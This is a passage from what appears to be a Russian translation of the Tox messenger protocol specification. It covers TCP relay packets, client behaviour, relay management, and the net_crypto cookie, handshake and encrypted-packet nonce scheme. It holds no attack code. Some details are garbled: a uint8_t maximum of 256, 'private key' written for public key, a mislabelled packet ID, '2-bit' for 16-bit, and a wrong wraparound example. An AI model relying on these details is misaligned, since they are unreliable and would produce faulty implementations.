7.5.7 Отправка OOB (0x06)

Длина | Содержание
---|---
1| uint8_t(0x06)
32| Открытый ключ назначения
переменная | Данные

7.5.8 Прием OOB (0x07)

Длина | Содержание
---|---
1| uint8_t(0x07)
32| Открытый ключ отправителя
переменная | Данные

7.5.9 Луковый пакет (0x08)

Тот же формат, что и у исходного лукового пакета, но идентификатор пакета — 0x08 вместо 0x80.

7.5.10 Ответ лукового пакета (0x09)

Тот же формат, что и у лукового пакета, но идентификатор пакета — 0x09 вместо 0x8e.

7.5.11 Данные (0x10 и выше)

Длина | Содержание
---|---
1| uint8_t идентификатор пакета
1| uint8_t идентификатор соединения
переменная | данные

TCP-сервер настроен таким образом, чтобы минимизировать потери при ретрансляции множества пакетов, которые могут проходить между двумя равноправными пользователями, поэтому клиенты должны создавать соединения с другими клиентами на реле. Номер соединения представляет собой uint8_t и должен быть равен или больше 16, чтобы быть действительным. Поскольку uint8_t имеет максимальное значение 256, это означает, что максимальное количество различных соединений с другими клиентами, которое может быть у каждого соединения, равно 240. Причина, по которой действительные connection_ids больше 16, заключается в том, что они являются первым байтом пакетов данных. В настоящее время используются только номера от 0 до 9, однако мы оставляем несколько дополнительных номеров на случай, если нам понадобится расширить протокол, не нарушая его полностью.
Запрос маршрутизации (отправляется клиентом серверу): Посылаем запрос маршрутизации на сервер, что мы хотим подключиться к пиру с открытым ключом, где открытый ключ - это тот, которым пир объявил себя. Сервер должен ответить на этот запрос ответом маршрутизации.
Ответ маршрутизации (отправляется сервером клиенту): Ответ на запрос маршрутизации, сообщает клиенту, был ли запрос маршрутизации успешным (действительный идентификатор соединения), и если да, то сообщает идентификатор соединения (идентификатор соединения). Открытый ключ, отправленный в запросе маршрутизации, также отправляется в ответе, чтобы клиент мог отправлять много запросов одновременно на сервер без необходимости отслеживать, какой ответ принадлежит какому открытому ключу.
Единственная причина, по которой запрос маршрутизации может не сработать, это если соединение достигло максимального количества одновременных соединений. В случае неудачи запроса маршрутизации открытый ключ в ответе будет соответствовать открытому ключу в неудачном запросе.
Уведомление о подключении (отправляется сервером клиенту): Сообщает клиенту, что connection_id теперь подключен, что означает, что другой находится в сети и данные могут быть отправлены с использованием этого connection_id.
Уведомление об отключении (отправляется клиентом серверу): Отправляется, когда клиент хочет, чтобы сервер забыл о соединении, связанном с connection_id в уведомлении. Сервер должен удалить это соединение и иметь возможность повторно использовать connection_id для другого соединения. Если соединение было установлено, сервер должен послать уведомление об отключении другому клиенту. Другой клиент должен думать, что этот клиент просто отключился от TCP-сервера.
Уведомление о разъединении (отправляется сервером клиенту): Отправляется сервером клиенту, чтобы сообщить ему, что соединение с connection_id, которое было подключено, теперь отключено. Оно отправляется либо когда другой клиент соединения отключается, либо когда он сообщает серверу о разрыве соединения (см. выше).
Пакеты Ping и Pong (могут быть посланы как клиентом, так и сервером, оба ответят): пакеты ping используются для того, чтобы узнать, жива ли другая сторона соединения. TCP при установлении соединения не имеет никаких разумных тайм-аутов (1 неделя - это не разумно), поэтому мы вынуждены иметь свой собственный способ проверки, жива ли другая сторона. Ping id может быть любым, кроме 0, это связано с тем, как toxcore устанавливает переменную, хранящую ping_id, который был отправлен, в 0, когда он получает ответ pong, что означает, что 0 недействителен.
Сервер должен посылать пакеты ping каждые X секунд (toxcore TCP_server посылает их каждые 30 секунд и прерывает работу пира, если не получает ответа за 10). Сервер должен немедленно отвечать на пакеты ping пакетами pong.
Сервер должен отвечать на ping-пакеты pong-пакетами с тем же ping_id, который был в ping-пакете. Сервер должен проверить, что каждый pong-пакет содержит тот же ping_id, что и в ping, если нет, то pong-пакет должен быть проигнорирован.

OOB send (Отправляется клиентом на сервер): Если подключен пир с закрытым ключом, равным ключу, которым он объявил себя, данные в пакете OOB send будут отправлены этому пиру как пакет OOB recv. Если такой пир не подключен, пакет отбрасывается. Реализация TCP_server в toxcore имеет жесткий максимум длины данных OOB, равный 1024. 1024 было выбрано потому, что оно достаточно велико для пакетов net_crypto, связанных с рукопожатием, и достаточно велико, чтобы любые изменения в протоколе не требовали разрушения TCP-сервера. Однако оно недостаточно велико для самых больших пакетов net_crypto, отправляемых при установленном соединении net_crypto, чтобы предотвратить их отправку через OOB-пакеты.
OOB recv (отправляется сервером клиенту): OOB recv посылаются с объявленным открытым ключом пира, который послал пакет OOB send, и точными данными.
OOB-пакеты могут использоваться так же, как и обычные пакеты данных, однако дополнительный размер делает отправку данных через них менее эффективной, чем через пакеты данных.
Данные: Пакеты данных могут быть отправлены и получены только в том случае, если соответствующий connection_id является соединением (от него было получено уведомление Connect). Если сервер получит пакет данных для неподключенного или несуществующего соединения, он отбросит его.
Почему я использовал разные идентификаторы пакетов для всех пакетов, если некоторые из них отправляются только клиентом, а некоторые только сервером? Так меньше путаницы.

8 TCP-клиент

TCP-клиент - это клиент для TCP-сервера. Он устанавливает и поддерживает соединение с TCP-сервером.
Все форматы пакетов подробно описаны в TCP-сервере, поэтому в этом разделе будут рассмотрены только специфические детали TCP-клиента, которые не описаны в документации по TCP-серверу.
TCP клиенты могут выбирать подключение к TCP серверам через прокси. Большинство распространенных типов прокси (SOCKS, HTTP) работают путем установления соединения через прокси, используя протокол этого конкретного типа прокси. После установления соединения через этот прокси с TCP-сервером сокет ведет себя с точки зрения приложения точно так же, как TCP-сокет, который подключается непосредственно к экземпляру TCP-сервера. Это означает, что поддержка прокси очень проста.
TCP-клиент сначала устанавливает TCP-соединение, либо через прокси, либо напрямую с TCP-сервером. Он использует открытый ключ DHT в качестве долгосрочного ключа при подключении к TCP-серверу.
Он устанавливает безопасное соединение с TCP-сервером. После установления соединения с TCP-сервером и получения ответа на квитирование от TCP-сервера реализация toxcore немедленно отправляет пакет ping. В идеале первыми отправленными пакетами должны быть пакеты запроса маршрутизации, но это решение упрощает код и позволяет серверу подтвердить соединение.

Ping-пакеты, как и все остальные пакеты данных, отправляются в зашифрованном виде.
Пакеты Ping отправляются клиентом toxcore TCP каждые 30 секунд с тайм-аутом в 10 секунд, с тем же интервалом и тайм-аутом, что и пакеты ping сервера toxcore TCP. Они одинаковы, потому что выполняют одну и ту же задачу. TCP-клиент должен иметь механизм, чтобы убедиться, что важные пакеты (запросы маршрутизации, уведомления об отключении, пакеты ping, пакеты ответа ping) не будут отброшены из-за того, что TCP-сокет переполнен. Если это произойдет, TCP-клиент должен сохранить эти пакеты и расставить их по порядку, когда TCP- сокет на сервере снова станет доступен для записи. TCP-клиент также должен учитывать, что пакеты могут быть больше, чем количество байт, которое он может записать в сокет в данный момент. В этом случае он должен сохранить байты пакета, которые он не записал в сокет, и записать их в сокет, как только сокет позволит, чтобы соединение не разорвалось. Он также должен предположить, что может получить только часть зашифрованного пакета. В этом случае он должен сохранить полученную часть пакета и подождать, пока придет остальная часть пакета, прежде чем обрабатывать его. TCP-клиент можно использовать для открытия маршрута к друзьям, подключенным к TCP-серверу. Это делается путем отправки запроса маршрутизации на TCP-сервер с открытым ключом DHT друга. Это указывает серверу на необходимость зарегистрировать connection_id в открытом ключе DHT, отправленном в пакете. Затем сервер ответит пакетом ответа маршрутизации. Если соединение было принято, TCP-клиент сохранит идентификатор соединения для этого соединения. TCP-клиент убедится, что пакеты ответа маршрутизации являются ответами на отправленный им пакет маршрутизации, сохранив, что он отправил пакет маршрутизации на этот открытый ключ, и сверив ответ с ним. Это предотвращает возможность использования клиента плохим TCP- сервером.

TCP-клиент будет обрабатывать уведомления о подключении и отключении, оповещая использующий его модуль о том, что соединение с другом установлено или прервано.
TCP-клиент посылает уведомление о разрыве соединения, чтобы прервать соединение с другом. Он должен отправить пакет уведомления о разрыве соединения независимо от того, был ли друг онлайн или оффлайн, чтобы TCP- сервер снял соединение с регистрации.
Данные друзьям можно отправлять через TCP-реле с помощью пакетов OOB (out of band) и подключенных соединений. Для отправки OOB-пакета необходимо знать открытый ключ DHT друга. Пакеты OOB отправляются вслепую, и нет способа запросить TCP-реле, чтобы узнать, подключен ли друг перед отправкой. Пакеты OOB следует отправлять, когда соединение с другом через TCP-реле не находится в подключенном состоянии, но известно, что друг подключен к этому реле. Если друг подключен через TCP реле, то должны быть отправлены обычные пакеты данных, так как они меньше, чем OOB пакеты.
OOB recv и пакеты данных должны быть обработаны и переданы в модуль, использующий их.

9 TCP-соединения

TCP_connections заботится об обработке нескольких экземпляров TCP-клиентов для установления надежного соединения через TCP-реле с другом. Соединение с другом с помощью только одного реле будет не очень надежным, поэтому TCP_connections обеспечивает уровень абстракции, необходимый для управления несколькими реле. Например, он гарантирует, что если один из ретрансляторов выйдет из строя, соединение с другом не пострадает. Это достигается путем соединения с другим аналогом с помощью более чем одного реле.
TCP-соединение в TCP_connections определяется как соединение с аналогом через одно или несколько TCP-реле. Для подключения к другому пиру с помощью TCP_connections будет создано соединение в TCP_connections с пиром с открытым ключом X DHT. Некоторые TCP-реле, к которым, как мы знаем, подключен пир, будут затем связаны с этим пиром. Если peer еще не подключен напрямую, эти реле будут теми, которые peer отправил нам через onion-модуль. Равный пользователь также будет отправлять некоторые реле, с которыми он непосредственно соединен, после установления соединения, однако это делается другим модулем.
TCP_connections имеет список всех реле, к которым он подключен. Он старается держать количество реле, к которым он подключен, как можно меньше, чтобы минимизировать нагрузку на реле и снизить использование полосы пропускания для клиента. В toxcore желаемое количество соединений TCP-реле для каждого пира установлено на 3, а максимальное - на 6. Причина этих чисел в том, что 1 означает отсутствие резервных ретрансляторов, а 2 - только 1 резервный. Чтобы быть уверенным в надежности соединения, 3 кажется разумным нижним пределом. Максимальное число 6 - это максимальное количество реле, которое может быть привязано к каждому сверстнику. Если 2 пира подключены каждый к 6+ реле, и им обоим нужно подключиться к такому количеству реле из-за других друзей, то здесь вступает в игру этот максимум. Нет причин, почему это число равно 6, но в toxcore оно должно быть по крайней мере вдвое больше желаемого числа (3), потому что код предполагает это.
При необходимости TCP_connections подключается к TCP-реле, чтобы использовать их для отправки луковых пакетов. Это делается только в том случае, если нет UDP-соединения с сетью. Когда есть UDP-соединение, пакеты отправляются только с помощью UDP, потому что отправка с помощью TCP-реле может быть менее надежной. Также важно, чтобы мы постоянно были подключены к некоторым реле, поскольку эти реле будут использоваться только TCP-аналогами для инициирования соединения с нами.

В toxcore каждый клиент подключен к 3 реле, даже если нет TCP пиров и onion не нужен. Оптимальным может быть подключение к этим реле только во время инициализации toxcore, поскольку это единственное время, когда пиры будут подключаться к нам через TCP-реле, к которым мы подключены. Из-за того, как работает onion, после фазы инициализации, когда каждый пир ищет в onion, а затем, если он найден, ему посылается информация, необходимая для обратного соединения (DHT pk, TCP реле), больше не должно быть пиров, соединяющихся с нами через TCP реле. Это может быть способом дальнейшего снижения нагрузки на TCP-реле, однако перед его реализацией необходимо провести дополнительные исследования.
TCP_connections выбирает один ретранслятор и использует только его для отправки данных другому пиру. Причина отказа от выбора случайного реле для каждого пакета заключается в том, что это сильно ухудшает качество связи между двумя пирами и делает передачу видео и аудио с потерями очень плохой. По этой причине выбирается один ретранслятор, который используется для передачи всех данных. Если по какой-либо причине данные не могут быть переданы через этот ретранслятор, используется следующий ретранслятор. Это может произойти, если сокет TCP переполнен, поэтому реле не обязательно должно быть сброшено в этом случае. Реле обрываются только в случае истечения времени или если они становятся бесполезными (если реле слишком много или они больше не используются для передачи данных другим пользователям).
TCP_connections в toxcore также содержит механизм, позволяющий переводить соединения в спящий режим. TCP-соединения с другими пирами могут быть переведены в спящий режим, если соединение с пиром устанавливается с помощью UDP после того, как соединение было установлено с помощью TCP. UDP - это метод, предпочитаемый net_crypto для связи с другими пирами. Чтобы отслеживать ретрансляторы, которые использовались для связи с другим пиром в случае, если UDP-соединение не работает, они сохраняются TCP_connections, когда соединение переводится в спящий режим. Любые реле, которые использовались только этим резервным соединением, сохраняются, а затем отключаются. Если соединение пробуждается, реле снова подключаются и соединение восстанавливается. Перевод соединения в спящий режим - это то же самое, что сохранение всех реле, используемых соединением, и удаление соединения. Пробуждение соединения равносильно созданию нового соединения с теми же параметрами и восстановлению всех реле.
Следует рассмотреть метод обнаружения потенциально неработающих реле, которые пытаются нарушить работу сети, утверждая, что они соединяются с одноранговым узлом, когда это не так, или злонамеренно отбрасывают все пакеты. В настоящее время в Toxcore не реализована такая система, и ее добавление требует дополнительных исследований и, вероятно, расширения протокола.
Когда TCP-соединение подключается к ретранслятору, оно создает новый экземпляр TCP_клиента для этого ретранслятора. В любой момент, если экземпляр TCP_client сообщает, что он отключился, TCP-реле будет прервано. Как только TCP-реле сообщит, что оно подключено, TCP_connections найдет все соединения, связанные с реле, и объявит реле, что хочет подключиться к каждому из них с помощью запросов маршрутизации. Если реле сообщает, что одноранговый клиент для соединения находится в сети, номер соединения и реле будут использоваться для отправки данных в этом соединении с помощью пакетов данных. Если пир не сообщает, что пир находится онлайн, но ретранслятор связан с соединением, то для отправки данных вместо пакетов данных будут использоваться пакеты TCP OOB (out of band). Пакеты TCP OOB используются в этом случае, так как ретранслятор, скорее всего, имеет подключенный пир, но не отправил запрос на маршрутизацию для соединения с нами.
TCP_connections используется как мост между отдельными экземплярами TCP_client и net_crypto, или мост между отдельными соединениями и чем-то, что требует интерфейса, похожего на одно соединение.

10 Сетевой криптопротокол

Транспортный протокол Tox - это то, что Tox использует для установления и безопасной отправки данных друзьям. Он обеспечивает шифрование, упорядоченную доставку и совершенную секретность пересылки. Это протокол UDP, но он также используется, когда два друга соединяются через TCP-реле.
Причина, по которой протокол для соединений с друзьями через TCP-реле и прямой UDP одинаков, заключается в простоте, чтобы соединение могло переключаться между двумя протоколами без необходимости разъединения и повторного соединения. Например, два пользователя Tox могут сначала соединиться по TCP, а через несколько секунд переключиться на UDP, когда станет возможным прямое UDP-соединение. Открытие UDP-маршрута или "сквозное соединение" выполняется модулем DHT, а открытие ретранслированного TCP-соединения - модулем TCP_connection. Транспортный протокол Tox выполняет задачу безопасного соединения двух пиров (друзей Tox) после того, как будет найден маршрут или канал связи между ними. Прямой UDP предпочтительнее TCP, потому что он прямой и не ограничен возможными перегруженными TCP-реле. Кроме того, пир может соединиться с другим, используя транспортный протокол Tox, только если он знает настоящий открытый ключ и открытый ключ DHT того пира, с которым он хочет соединиться. Однако модули DHT и TCP-соединения требуют эту информацию для того, чтобы найти и открыть маршрут к пиру, что означает, что мы предполагаем, что эта информация известна toxcore и была передана net_crypto при создании соединения
net_crypto.
Поскольку этот протокол работает через UDP, он должен учитывать возможную потерю пакетов, пакеты, приходящие в неправильном порядке, и должен реализовать некоторый контроль перегрузки. Это реализовано выше уровня, на котором зашифрованы пакеты. Это не позволяет злонамеренному TCP-реле нарушить соединение, изменяя проходящие через него пакеты. Предотвращение потери пакетов позволяет очень хорошо работать с TCP-реле, которые, как мы предполагаем, могут выйти из строя в любой момент, поскольку соединение будет оставаться прочным, даже если потребуется переключиться на другое TCP-реле, что приведет к потере пакетов.
Перед отправкой фактического пакета рукопожатия одноранговый клиент должен получить cookie. Этот шаг получения cookie служит для принимающего peer'а способом подтверждения того, что peer, инициирующий соединение, может получать ответы, чтобы предотвратить некоторые типы DoS-атак.
Равный пользователь, получивший пакет запроса cookie, не должен выделять никаких ресурсов для соединения. Он просто отвечает на пакет пакетом ответа cookie, содержащим cookie, который запрашивающий пир должен затем использовать в квитировании для установления фактического соединения.
Ответ cookie должен быть отправлен обратно по той же ссылке, по которой был отправлен пакет запроса cookie. Причина этого заключается в том, что если ответ будет отправлен по другому каналу, то этот канал может не работать, и пир не будет ожидать ответа от другого канала. Например, если запрос отправлен по UDP с ip-портом X, он должен быть отправлен обратно по UDP на ip-порт X. Если запрос был получен из пакета TCP OOB, он должен быть отправлен обратно пакетом TCP OOB через тот же ретранслятор, причем получателем должен быть пир, который отправил запрос. Если он был получен из установленного соединения TCP relay, он должен быть отправлен обратно через такое же соединение.
Когда получен запрос на cookie, пир не должен использовать информацию в пакете запроса для чего-либо, он не должен хранить ее, он должен только создать cookie и ответ на него, затем отправить созданный пакет ответа на cookie и забыть их. Это делается для того, чтобы предотвратить возможные атаки. Например, если пир будет выделять долговременную память для каждого полученного пакета запроса куки, то простого переполнения пакетов будет достаточно для эффективной атаки отказа в обслуживании, заставив программу исчерпать память.

Code:Copy to clipboard

cookie request packet (145 bytes): [uint8_t 24] [Sender's DHT Public key (32 bytes)] [Random nonce (24 bytes)] [Encrypted message containing: [Sender's real public key (32 bytes)] [padding (32 bytes)] [uint64_t echo id (must be sent back untouched in cookie response)] ]

Зашифрованное сообщение шифруется с помощью закрытого ключа DHT отправителя, открытого ключа DHT получателя и ключа nonce.
Идентификатор пакета для пакетов запроса cookie - 24. Запрос содержит открытый ключ DHT отправителя, который является ключом, используемым (закрытый ключ DHT) (вместе с открытым ключом DHT получателя) для шифрования зашифрованной части пакета cookie, и nonce, также используемый для шифрования зашифрованной части пакета. Вставка используется для поддержания обратной совместимости с предыдущими версиями протокола. Идентификатор echo id в запросе cookie должен быть отправлен обратно нетронутым в ответе cookie. Этот идентификатор эха - это способ, с помощью которого отправляющий запрос пир может быть уверен, что полученный ответ был ответом на отправленный им пакет.
Причина отправки открытого ключа DHT и реального открытого ключа в запросе cookie в том, что оба они содержатся в cookie, отправленном обратно в ответе.
В настоящее время Toxcore посылает 1 пакет запроса cookie каждую секунду 8 раз перед тем, как разорвать соединение, если нет ответов.

Code:Copy to clipboard

cookie response packet (161 bytes): [uint8_t 25] [Random nonce (24 bytes)] [Encrypted message containing: [Cookie] [uint64_t echo id (that was sent in the request)] ]

Зашифрованное сообщение шифруется тем же симметричным ключом, что и пакет запроса cookie, на который оно отвечает, но с другим nonce.
Идентификатор пакета для пакетов запроса cookie - 25. Ответ содержит nonce и зашифрованную часть, зашифрованную с помощью nonce. Зашифрованная часть шифруется тем же ключом, который используется для расшифровки зашифрованной части запроса, что означает, что дорогостоящая генерация общего ключа должна быть вызвана только один раз для обработки и ответа на пакет запроса cookie с ответом cookie.
Содержимым зашифрованной части является Cookie (см. ниже) и идентификатор echo, который был отправлен в запросе.

Code:Copy to clipboard

The Cookie should be (112 bytes): [nonce] [encrypted data: [uint64_t time] [Sender's real public key (32 bytes)] [Sender's DHT public key (32 bytes)] ]

Cookie - это 112-байтовый фрагмент данных, который создается и отправляется запрашивающему пользователю как часть пакета ответа cookie. Пир, который хочет подключиться к другому, должен получить пакет cookie от того пира, к которому он пытается подключиться. Единственный способ отправить корректный пакет рукопожатия другому пиру - это сначала получить от него cookie.
Cookie содержит информацию, которая докажет получателю рукопожатия, что пир получил ответ cookie, и содержит зашифрованную информацию, которая сообщит получателю пакета рукопожатия достаточно информации для расшифровки, проверки пакета рукопожатия и принятия соединения.
Когда запускается toxcore, он генерирует симметричный ключ шифрования, который он использует для шифрования и расшифровки всех пакетов cookie (используя NaCl аутентифицированное шифрование точно так же, как и шифрование везде в toxcore). Только экземпляр toxcore, создающий пакеты, знает ключ шифрования, что означает, что все cookie, которые он успешно расшифровывает и проверяет, были созданы им.
Переменная времени в cookie используется для предотвращения использования слишком старых пакетов cookie. В Toxcore установлен тайм-аут в 15 секунд для пакетов cookie. Если пакет cookie используется более чем через 15 секунд после его создания, Toxcore будет считать его недействительным.
При ответе на пакет запроса cookie реальный открытый ключ отправителя - это известный ключ, отправленный peer'ом в зашифрованной части пакета запроса cookie, а открытый ключ DHT отправителя - это ключ, используемый для шифрования зашифрованной части пакета запроса cookie.
При генерации cookie для помещения в зашифрованную часть рукопожатия: Одним из требований для успешного подключения к другому человеку является то, что мы знаем его открытый ключ DHT и его реальный долгосрочный открытый ключ, что означает наличие достаточной информации для создания cookie.

Пакет рукопожатия:

Code:Copy to clipboard

[uint8_t 26] [Cookie] [nonce (24 bytes)] [Encrypted message containing: [24 bytes base nonce] [session public key of the peer (32 bytes)] [sha512 hash of the entire Cookie sitting outside the encrypted part] [Other Cookie (used by the other to respond to the handshake packet)] ]

ID пакета для пакетов рукопожатия - 26. Cookie - это cookie-файл, полученный путем отправки сверстнику пакета запроса cookie и получения ответного пакета с cookie-файлом в нем. Он также может быть получен в пакете квитирования при получении сверстником пакета квитирования (Other Cookie).
Nonce - это число, используемое для шифрования зашифрованной части пакета рукопожатия. Зашифрованная часть пакета рукопожатия шифруется с помощью долговременных ключей обоих пиров. Это делается для предотвращения выдачи себя за другого.
Внутри зашифрованной части пакета рукопожатия находится " base nonce" и открытый ключ сессии. Base nonce" - это значение, которое другая сторона должна использовать для шифрования каждого пакета данных, добавляя + 1 к нему для каждого отправленного пакета данных. (первый пакет - 'base nonce' + 0, следующий - 'base nonce' + 1 и т.д.). Обратите внимание, что для математических операций nonce рассматривается как 24-байтовое число в формате big endian). Сеансовый ключ - это временный открытый ключ соединения, который пир сгенерировал для данного соединения и отправляет другому пиру. Этот сеансовый ключ используется для того, чтобы соединение имело идеальную прямую секретность. Важно сохранить аналог закрытого ключа открытого ключа сеанса, отправленного во время рукопожатия, открытый ключ, полученный другой стороной, и оба полученных и отправленных базовых несов, поскольку они используются для шифрования/дешифрования пакетов данных.
Хеш cookie в зашифрованной части используется для того, чтобы убедиться, что злоумышленник не взял более старый действительный пакет рукопожатия и не заменил пакет cookie внутри более новым, что было бы плохо, так как он мог бы воспроизвести его и, возможно, устроить беспорядок.
Other Cookie" - это действительный cookie, который мы помещаем в рукопожатие, чтобы другая сторона могла ответить действительным рукопожатием без необходимости делать запрос на получение cookie.
Пакет рукопожатия отправляется обеими сторонами соединения. Если одноранговый компьютер получает рукопожатие, он проверяет, действителен ли cookie, расшифровывается ли зашифрованная часть и подтверждается ли она, действителен ли хэш cookie, принадлежит ли долгосрочный открытый ключ известному другу. Если все эти данные верны, то соединение считается "Принятым", но не "Подтвержденным".
Если нет существующего соединения с пиром, идентифицированным долгосрочным открытым ключом, для которого нужно установить статус 'Принято', то будет создано соединение с этим статусом. Если соединение с таким пиром со статусом 'Принято' еще не существует, это соединение будет установлено как принятое. Если для данного пира существует соединение со статусом 'Подтвержден', пакет рукопожатия будет проигнорирован и отброшен (Причина отбрасывания заключается в том, что мы не хотим, чтобы несколько запоздалые пакеты рукопожатия убили соединение), за исключением случаев, когда открытый ключ DHT в cookie, содержащемся в пакете рукопожатия, отличается от известного открытого ключа DHT пира. В этом случае соединение будет немедленно уничтожено, поскольку это означает, что оно больше не действительно, и новое соединение будет немедленно создано со статусом 'Принято'.
Иногда toxcore может получить открытый ключ DHT пира сначала с пакетом рукопожатия, поэтому важно, чтобы этот случай был обработан и чтобы реализация передавала открытый ключ DHT другим модулям (DHT, TCP_connection, потому что такое случается.
Пакеты Handshake должны создаваться только один раз во время соединения, но должны отправляться с интервалами, пока мы не убедимся, что другой модуль их получил. Это происходит, когда получен и расшифрован правильный зашифрованный пакет данных.

Состояния соединения:

Не принято: Посылать пакеты квитирования.
Принято: Пакет квитирования был получен от другого аналога, но нет зашифрованных пакетов: продолжайте (или начните) отправлять пакеты квитирования, поскольку аналог не может знать, получил ли его другой.
Подтверждено: Действительный зашифрованный пакет был получен от другого аналога: Соединение полностью установлено: прекратите отправку квитирующих пакетов.

Toxcore посылает квитирующие пакеты каждую секунду 8 раз и прерывает соединение, если соединение не подтверждается (не получен зашифрованный пакет) в течение этого времени.

Идеальный сценарий рукопожатия:

View attachment 54377

Причина, по которой рукопожатие происходит именно таким образом, заключается в определенных требованиях к конструкции:

Рукопожатие не должно передавать долгосрочные открытые ключи пиров возможному злоумышленнику, который будет просматривать пакеты, но каждый пир должен точно знать, что он соединяется с правильным пиром, а не с самозванцем.
Соединение должно быть установлено, если только один из пиров имеет информацию, необходимую для инициирования соединения (открытый ключ DHT пира и ссылка на пир).
Если оба пира инициируют соединение друг с другом одновременно, соединение должно быть успешным и без проблем.
Должна быть обеспечена идеальная передовая секретность.
Должна быть устойчива к любым возможным атакам.

В связи с тем, как он спроектирован, только одно соединение возможно одновременно между двумя сверстниками.

Зашифрованные пакеты:

Length| Contents
---|---
1| uint8_t (0x1b)
2| uint16_t The last 2 bytes of the nonce used to encrypt this
variable| Payload

Полезная нагрузка шифруется ключом сеанса и "базовым нецелем", заданным получателем в квитировании + номер пакета (начиная с 0, большая эндинарная математика).
Идентификатор пакета для зашифрованных пакетов равен 27. Зашифрованные пакеты

это пакеты, используемые для отправки данных другому пирингу в соединении. Поскольку эти пакеты могут быть отправлены по UDP, реализация должна предполагать, что они могут прийти не по порядку или даже не прийти вообще.
Чтобы получить ключ, используемый для шифрования/дешифрования каждого пакета в соединении, пир берет открытый ключ сессии, полученный во время рукопожатия, и аналог закрытого ключа, который он отправил во время рукопожатия, и генерирует из них общий ключ. Этот общий ключ будет идентичным для обоих пиров. Важно отметить, что ключи соединения должны быть стерты при разрыве соединения.
Чтобы создать зашифрованный пакет для отправки другому пиру, данные шифруются с помощью общего ключа для этого соединения и базового nonce, который другой пир отправил в пакете рукопожатия, с добавлением к нему общего количества зашифрованных пакетов, отправленных в соединении ('base nonce' + 0 для первого отправленного зашифрованного пакета данных, 'base nonce' + 1 для второго и т.д.). Обратите внимание, что для математических операций, таких как сложение, nonce рассматривается как большое конечное число). 2-байтовое число (uint16_t) в начале зашифрованного пакета - это последние 2 байта этого 24-байтового nonce.
Чтобы расшифровать полученный зашифрованный пакет, вычисляется nonce, которым был зашифрован пакет, используя базовый nonce, который отправил друг другу одноранговый клиент, и 2-байтовое число в начале пакета. Сначала мы предполагаем, что пакеты, скорее всего, будут приходить не по порядку и некоторые из них будут потеряны, но потери пакетов и отсутствие порядка никогда не будут достаточными для того, чтобы номеру в 2 байта понадобился дополнительный байт. Пакет расшифровывается с использованием общего ключа для соединения и вычисленного nonce.
Toxcore использует следующий метод для вычисления nonce для каждого пакета:

diff = (2 байта номера на пакете) - (последние 2 байта текущего сохраненного базового nonce) ПРИМЕЧАНИЕ: рассматривайте эти 3 переменные как 16-битные беззнаковые числа, ожидается, что результат будет иногда переворачиваться.

скопируйте saved_base_nonce в temp_nonce.
temp_nonce = temp_nonce + diff. temp_nonce - правильный nonce, который может быть использован для расшифровки пакета.
DATA_NUM_THRESHOLD = (1/3 от максимального числа, которое может быть сохранено в беззнаковом 2-битовом целочисленном числе).
если расшифровка прошла успешно и diff > (DATA_NUM_THRESHOLD * 2), то:
saved_base_nonce = saved_base_nonce + DATA_NUM_THRESHOLD

Сначала берется разница между 2 байтами номера в пакете и последним. Поскольку 3 значения являются беззнаковыми 16-битными интами, а перенос является частью математики, что-то вроде diff = (10 - 65536) означает, что diff равно 11.

Затем он копирует сохраненный базовый nonce в буфер временного nonce.
Затем он добавляет diff к nonce (nonce находится в формате big endian).
После успешной расшифровки проверяется, было ли diff больше, чем 2/3 значения, которое может содержаться в 16-битном беззнаковом int, и в случае успеха увеличивает сохраненный базовый nonce на 1/3 от максимального значения.
Это только один из многих способов, которыми может быть вычислен nonce для каждого зашифрованного пакета.
Зашифрованные пакеты, которые не могут быть расшифрованы, просто отбрасываются.
Причина обмена базовыми несами заключается в том, что поскольку ключ для шифрования пакетов одинаков для полученных и отправленных пакетов, должен существовать криптографический способ сделать невозможной атаку, в результате которой кто-то сможет воспроизвести пакеты обратно отправителю, а отправитель будет думать, что эти пакеты пришли от другого аналога.
Данные в зашифрованных пакетах:

[our recvbuffers buffer_start, (highest packet number handled + 1), (big endian)]
[uint32_t packet number if lossless, sendbuffer buffer_end if lossy, (big endian)]
[data]

Зашифрованные пакеты могут быть с потерями или без потерь. Пакеты с потерями - это просто зашифрованные пакеты, которые отправляются друг другу. Если они будут потеряны, придут в неправильном порядке или даже если злоумышленник продублирует их (обязательно учитывайте это для всего, что использует пакеты с потерями), они просто будут расшифрованы по мере поступления и переданы тому, кто должен их обрабатывать, в зависимости от идентификатора данных.
Пакеты без потерь - это пакеты, содержащие данные, которые будут доставлены по порядку в соответствии с реализацией протокола. В этом протоколе получатель сообщает отправителю, какие номера пакетов он получил, а какие нет, и отправитель должен повторно отправить все пакеты, которые были потеряны. Любая попытка удвоения пакетов приведет к тому, что все (кроме первого полученного) будут проигнорированы.
Каждый пакет без потерь содержит как 4-байтовый номер, указывающий на самый старший номер полученного и обработанного пакета, так и 4-байтовый номер пакета, который является номером данных в пакете.
В пакетах с потерями схема такая же, только вместо номера пакета второй 4-байтовый номер представляет собой номер пакета без потерь, если бы он был отправлен сразу после него. Это число используется приемником, чтобы узнать, были ли потеряны какие-либо пакеты. (например, если он получает 4 пакета с номерами (0, 1, 2, 5), а затем позже пакет с потерями с вторым номером: 8, он знает, что пакеты: 3, 4, 6, 7 были потеряны и запросит их).
Как достигается надежность:
Прежде всего, важно сказать, что номера пакетов переносятся, следующее число после 0xFFFFFFFF (максимальное значение в 4 байтах) - 0. Следовательно, все математические операции с номерами пакетов предполагаются только для беззнаковых 32-битных целых чисел, если не сказано иначе. Например, 0 - 0xFFFFFFFF будет равно 1 из-за опрокидывания.
При отправке пакета без потерь создается пакет, номер пакета которого равен номеру последнего созданного пакета без потерь + 1 (начиная с 0). Номера пакетов используются как для надежности, так и для упорядоченной доставки, поэтому они должны быть последовательными.
Затем пакет сохраняется вместе с номером пакета, чтобы пир мог отправить его снова, если получатель не получит его. Пакеты удаляются из хранилища только тогда, когда получатель подтверждает, что получил их.
Приемник получает пакеты и сохраняет их вместе с номером пакета. Когда приемник получает пакет, он сохраняет его вместе с номером пакета в массиве. Если в буфере уже есть пакет с таким номером, пакет отбрасывается. Если номер пакета меньше, чем номер последнего обработанного пакета, пакет отбрасывается. Обработанный пакет означает, что он был извлечен из буфера и передан вверх соответствующему модулю.
Предполагая новое соединение, отправитель посылает 5 пакетов без потерь получателю: 0, 1, 2, 3, 4 - это номера отправленных пакетов, а получатель получает: 3, 2, 0, 2 в таком порядке.
